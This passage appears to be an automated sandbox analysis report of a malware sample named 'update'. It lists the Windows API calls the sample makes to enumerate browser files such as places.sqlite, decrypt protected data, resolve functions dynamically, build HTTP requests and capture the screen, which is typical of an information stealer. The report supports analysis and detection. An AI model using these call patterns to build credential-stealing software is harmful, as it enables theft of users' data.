                                                                                                            • FindNextFileW.KERNEL32(?,?,0041C80C,004132B8,?,004132B8,0041A232,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413217
                                                                                                            • FindClose.KERNEL32(?,?,?,0041C80C,004132B8,?,004132B8,0041A232,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413228
                                                                                                              • Part of subcall function 0041253C: GetTickCount.KERNEL32 ref: 00412580
                                                                                                              • Part of subcall function 0041253C: 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AllocAttributesCloseCountD67450FirstNextStringTick
                                                                                                            • String ID: .txt$\*.*$\places.sqlite
                                                                                                            • API String ID: 3882801140-3919338718
                                                                                                            • Opcode ID: ec560269c81936adf07f7ff3aaaf6b143af8a4e6812d11f13f8f76c8d5feb3d0
                                                                                                            • Instruction ID: db2ad4c0925ffecf13339862ae006cc807f871b19183d5a4da560477eb916681
                                                                                                            • Opcode Fuzzy Hash: ec560269c81936adf07f7ff3aaaf6b143af8a4e6812d11f13f8f76c8d5feb3d0
                                                                                                            • Instruction Fuzzy Hash: 50512E749042199FCF50EF62CC89ACDBBB9EB48305F5041FAA508B3251DB399F858F18
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053,00000000,00000000,00000000,?,00411CBE,00000000,00000000), ref: 00411678
                                                                                                              • Part of subcall function 004112D0: GetTickCount.KERNEL32 ref: 00411315
                                                                                                              • Part of subcall function 004112D0: 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                                                                                                            • FindNextFileW.KERNEL32(?,?,0041C91C,00411988,?,00411988,0041A232,00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053), ref: 004118B1
                                                                                                            • FindClose.KERNEL32(?,?,?,0041C91C,00411988,?,00411988,0041A232,00000000,?,00000000,0041195E,?,00000000,?,00000000), ref: 004118C2
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseCountD67450FirstFreeNextStringTick
                                                                                                            • String ID: .txt$\*.*
                                                                                                            • API String ID: 182094936-2615687548
                                                                                                            • Opcode ID: 42ad6f2f07dfb6a25be9780b71739f636c23f16ae05a15835c9cb2f7ef558c53
                                                                                                            • Instruction ID: 5d1a81ccab342788691620b24a62b0bf455cea36908fa984f2d283373c0e855c
                                                                                                            • Opcode Fuzzy Hash: 42ad6f2f07dfb6a25be9780b71739f636c23f16ae05a15835c9cb2f7ef558c53
                                                                                                            • Instruction Fuzzy Hash: 40813C7490011DAFCF11EB51CC56BDDB779EF44304F6081EAA218B62A1DB399F858F58
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A232,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
                                                                                                            • FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A232,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB
                                                                                                              • Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
                                                                                                              • Part of subcall function 00410D88: 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AllocAttributesCloseCountD67450FirstNextStringTick
                                                                                                            • String ID: .txt$\*.*
                                                                                                            • API String ID: 3882801140-2615687548
                                                                                                            • Opcode ID: 1e7d7e85e0fc797bc53a84780c3fe4d989827ee1ff23332d6361331b0a78df9a
                                                                                                            • Instruction ID: bf64687dc2ad86eb18c2fbcd59d677e1e6eaf9ec35dfa69074ee7f3f85d2a588
                                                                                                            • Opcode Fuzzy Hash: 1e7d7e85e0fc797bc53a84780c3fe4d989827ee1ff23332d6361331b0a78df9a
                                                                                                            • Instruction Fuzzy Hash: 25514B749052199FCF61EF61CD85ACDBBB8EB48304F5081FAA508B32A1DB389F858F54
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A232,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
                                                                                                            • FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A232,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB
                                                                                                              • Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
                                                                                                              • Part of subcall function 00410D88: 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AllocAttributesCloseCountD67450FirstNextStringTick
                                                                                                            • String ID: .txt$\*.*
                                                                                                            • API String ID: 3882801140-2615687548
                                                                                                            • Opcode ID: 9ed39196901e4c4264153a5eda5fee9cbbdfd45b17cdb1ef7785d40ff299e03a
                                                                                                            • Instruction ID: 460237bab6dc973d40a851033a2d7f34c10cc3b5c211c467e1e524dd2a58d6ff
                                                                                                            • Opcode Fuzzy Hash: 9ed39196901e4c4264153a5eda5fee9cbbdfd45b17cdb1ef7785d40ff299e03a
                                                                                                            • Instruction Fuzzy Hash: E9511C749052199FCF61EF61CD89ACDBBB9EB48304F5081FAA508B3261DB389F858F54
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A631
                                                                                                            • LocalFree.KERNEL32(?), ref: 0040A656
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataFreeLocalUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 1561624719-0
                                                                                                            • Opcode ID: 4cb84ba265810d0427a3151a5d59ee8d30dfb7262f640eff190e35c4dcdf75f3
                                                                                                            • Instruction ID: 789b43464e992449ae21f91847352ccfea11bbcfb58c617e1741a13a3b8d6e83
                                                                                                            • Opcode Fuzzy Hash: 4cb84ba265810d0427a3151a5d59ee8d30dfb7262f640eff190e35c4dcdf75f3
                                                                                                            • Instruction Fuzzy Hash: 85F0BEB1344300ABD310EE69CC82B4BB7E8AB84700F14893E7698EB2D1D639E955875A
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(0041B0DC,00000000,00000005,0040B24C,00000000,?,00000000,0040B2AD,0041A232), ref: 0040B23C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID:
                                                                                                            • API String ID: 542301482-0
                                                                                                            • Opcode ID: ea87c094835d07a58bc1d5365071f3338e958cacf1eec016397e9f1b13d5280c
                                                                                                            • Instruction ID: 69e00c9d87702f46269832269a6170cc29c97575f005fbbd27e421e5aa9de9af
                                                                                                            • Opcode Fuzzy Hash: ea87c094835d07a58bc1d5365071f3338e958cacf1eec016397e9f1b13d5280c
                                                                                                            • Instruction Fuzzy Hash: 64C0029538166026E12471AA1C9AF5F458CCB89B59F2504BBB614FA2D7A6A85C0002ED
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00418731), ref: 00405679
                                                                                                            • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 00405688
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040569A
                                                                                                            • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 004056AC
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 004056BE
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 004056D0
                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004056E2
                                                                                                            • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056F4
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 00405706
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 00405718
                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 0040572A
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040573C
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 0040574E
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405760
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405772
                                                                                                            • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 00405784
                                                                                                            • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 00405796
                                                                                                            • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 004057A8
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 004057BA
                                                                                                            • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 004057CC
                                                                                                            • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057DE
                                                                                                            • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057F0
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00405802
                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00405814
                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00405826
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 00405838
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040584A
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 0040585C
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 0040586E
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405880
                                                                                                            • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405892
                                                                                                            • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 004058A4
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004058B6
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004058C8
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058DA
                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058E9
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058F8
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 0040590A
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 0040591C
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0040592E
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405940
                                                                                                            • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405952
                                                                                                            • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 00405964
                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 00405976
                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00405988
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 0040599A
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 004059AC
                                                                                                            • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 004059BE
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004059D0
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059E2
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059F4
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 00405A06
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 00405A18
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00405A2A
                                                                                                            • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 00405A39
                                                                                                            • GetProcAddress.KERNEL32(75BD0000,EnumDisplayDevicesW), ref: 00405A4E
                                                                                                            • GetProcAddress.KERNEL32(75BD0000,wvsprintfA), ref: 00405A63
                                                                                                            • GetProcAddress.KERNEL32(75BD0000,GetKeyboardLayoutList), ref: 00405A78
                                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,75BD0000,GetKeyboardLayoutList,75BD0000,wvsprintfA,75BD0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A87
                                                                                                            • GetProcAddress.KERNEL32(75DA0000,ShellExecuteExW), ref: 00405A9C
                                                                                                            • LoadLibraryA.KERNEL32(ntdll.dll,75DA0000,ShellExecuteExW,shell32.dll,75BD0000,GetKeyboardLayoutList,75BD0000,wvsprintfA,75BD0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405AAB
                                                                                                            • GetProcAddress.KERNEL32(76E90000,RtlComputeCrc32), ref: 00405AC0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                            • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                                                                                                            • API String ID: 2238633743-3531362093
                                                                                                            • Opcode ID: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
                                                                                                            • Instruction ID: b4e9e9acb65dceb8197331e62ecd6ac44c6462922570a5848b60e957845f71d1
                                                                                                            • Opcode Fuzzy Hash: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
                                                                                                            • Instruction Fuzzy Hash: 6EB15BB1A90710AFD700BFA5DC86A6A37A8FB4A704351593BB550FF2E5D6789C008F9C
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,00417C51,?,00000000,00000000,?,00418223,00000000,?,?,?), ref: 004178CC
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00417C51,?,00000000,00000000,?,00418223,00000000,?,?,?), ref: 004178E0
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004178F4
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000017), ref: 0041790B
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000025), ref: 00417922
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000002C), ref: 00417939
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000031), ref: 00417950
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000036), ref: 00417967
                                                                                                            • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041797E
                                                                                                            • GetProcAddress.KERNEL32(00000000,-00000044), ref: 00417995
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                            • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
                                                                                                            • API String ID: 384173800-3355491746
                                                                                                            • Opcode ID: 4c44cd97518fedb02a7e5808d34ed3d9c74ac5f62f9f419dd1205377cafdabec
                                                                                                            • Instruction ID: 31654010b862b105af4b50c917f5d831bb79803e3d83f100470ac79b744d8150
                                                                                                            • Opcode Fuzzy Hash: 4c44cd97518fedb02a7e5808d34ed3d9c74ac5f62f9f419dd1205377cafdabec
                                                                                                            • Instruction Fuzzy Hash: 7FB1F1B19042099BDB10EF65DC86AEFBBB8BB04709F50407BE505F22D1DB78AA458F58
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
                                                                                                            • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
                                                                                                            • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
                                                                                                            • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
                                                                                                            • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0
                                                                                                              • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195CF,?), ref: 00402778
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                            • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                            • API String ID: 2206896924-1825016774
                                                                                                            • Opcode ID: a21f98e2dfab7d3b86ae44e6157d16c69e3d59663961867a37b5d2f4c036abd5
                                                                                                            • Instruction ID: ac0e2f41aa2f423c9d9a8d80f7c11eaba859030c7a64cc794fed102b433a0b1d
                                                                                                            • Opcode Fuzzy Hash: a21f98e2dfab7d3b86ae44e6157d16c69e3d59663961867a37b5d2f4c036abd5
                                                                                                            • Instruction Fuzzy Hash: 2A3139B1A44208AEDB00EBE5CC42F9EBBB8AB49704F50057AF514F71D1DA78AA058B58
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
                                                                                                            • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
                                                                                                            • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
                                                                                                            • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
                                                                                                            • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0
                                                                                                              • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195CF,?), ref: 00402778
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                            • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                            • API String ID: 2206896924-1825016774
                                                                                                            • Opcode ID: 74f53505709ef44e2898c60d809ae1c996b8e31be0853500e01ab79439eee861
                                                                                                            • Instruction ID: 15232c232ae21084946ce838b98eef105223b8b68f92314a8400df0ccc42bf71
                                                                                                            • Opcode Fuzzy Hash: 74f53505709ef44e2898c60d809ae1c996b8e31be0853500e01ab79439eee861
                                                                                                            • Instruction Fuzzy Hash: CF313AB1A04309AEDB00EBE5CC42F9EBBECAF49704F500576F514F71D1EA78AA048B58
                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 004170B0
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 004170B9
                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,0041A232,?), ref: 004170C9
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004170D2
                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,0041A232,?,00000000,00000000,?,00CC0020), ref: 004170F2
                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,000000FF,00000000), ref: 00417104
                                                                                                            • GetHGlobalFromStream.COMBASE(?,?), ref: 00417192
                                                                                                            • GlobalLock.KERNEL32(?), ref: 0041719C
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 004171BE
                                                                                                            • DeleteObject.GDI32(00000000), ref: 004171C4
                                                                                                            • DeleteDC.GDI32(00000000), ref: 004171CA
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004171D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Global$Create$CompatibleDeleteObjectStream$BitmapFromLockReleaseSelectUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 734935659-0
                                                                                                            • Opcode ID: c98ac460d9aec4965d51a17cd1e49efe02cdd842e78125eb196d6cf9cfaad22f
                                                                                                            • Instruction ID: d8e405fcbd13f985ed7bb7b3625ce17cc52e98bbe45029a5e74dda917b66e948
                                                                                                            • Opcode Fuzzy Hash: c98ac460d9aec4965d51a17cd1e49efe02cdd842e78125eb196d6cf9cfaad22f
